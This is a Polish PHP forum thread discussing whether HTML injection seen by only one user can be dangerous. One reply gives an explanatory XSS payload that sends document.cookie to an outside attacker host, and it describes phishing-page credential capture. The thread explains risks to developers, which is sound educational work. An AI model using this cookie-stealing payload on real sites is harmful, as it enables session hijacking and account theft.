Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Html injection - czy może być naprawdę groźne.
Lk_hc
post
Post #1





Grupa: Zarejestrowani
Postów: 36
Pomógł: 1
Dołączył: 12.06.2006

Ostrzeżenie: (0%)
-----

Html injection - czy może być naprawdę groźne, jeśli założymy, że zachodzi tylko na danych wyświetlanych jednemu użytkownikowi, tymczasowo (np zapytanie do szukarki). Oczywiste jest że jest destruktywne na forach czy systemach komentarzy bo szpeci, ale czy może być groźne dla serwera / aplikacji?
Go to the top of the page
+Quote Post
 
 Start new topic
Odpowiedzi
Crozin
post
Post #2





Grupa: Zarejestrowani
Postów: 6 476
Pomógł: 1306
Dołączył: 6.08.2006
Skąd: Kraków

Ostrzeżenie: (0%)
-----

Bardzo prosto jest zmylić kogoś, by kliknął w link, któremu uwać nie powinien:
Kod
wejdź na <script type="text/javascript">document.write('<a href="http://mojaStrona.pl/?c=' + escape(document.cookie) + '">http://forum.php.pl/e_t109179.html</a>');</script> i poszukaj...
Przy czym na mojaStrona.pl może dojść do zapisania danych i przekierowania na Temat: e aby ofiara nawet nie była świadoma, że coś jest nie tak. Równie dobrze można też wyświetlić identyczną stronę (jak docelowa), ale wszystkie dane wprowadzone przez użytkownika zapisywać (loginy, hasła itp.)
Go to the top of the page
+Quote Post

Posty w temacie
- Lk_hc   Html injection - czy może być naprawdę groźne.   12.12.2008, 15:50:27
- - Riklaunim   tak, można wykraść cookie usera - np. admina   12.12.2008, 15:56:34
- - Lk_hc   A to nie jest tak że alertnąć można tylko swoje co...   12.12.2008, 16:05:28
- - wookieb   A jak ktoś sobie zrobi <script src="http:...   12.12.2008, 16:09:13
- - Lk_hc   No tak - to zadziała w przypadku forów, komentarzy...   12.12.2008, 16:17:26
- - Riklaunim   Ogólnie jeżeli twój kod jest podatny na XSS to jeg...   12.12.2008, 16:56:57
- - Lk_hc   No jasne, że zerowa. Dlatego nie pisze takiego kod...   19.12.2008, 15:35:07
- - Crozin   Bardzo prosto jest zmylić kogoś, by kliknął w link...   19.12.2008, 17:29:31
- - in5ane   Trochę nie na temat, ale jak np. odczytać takie CO...   19.12.2008, 17:42:40
- - Crozin   Jeżeli "zły" link wygląda tak jak ten mó...   19.12.2008, 18:37:41
- - bełdzio   tu byłem ;-) http://www.beldzio.com/niebezpieczen...   19.12.2008, 20:58:14
- - piotrooo89   a jeszcze warto wspomnieć o spam botach które wyko...   19.12.2008, 21:15:05

« Następny starszy · Przedszkole · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 18.10.2025 - 11:54
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn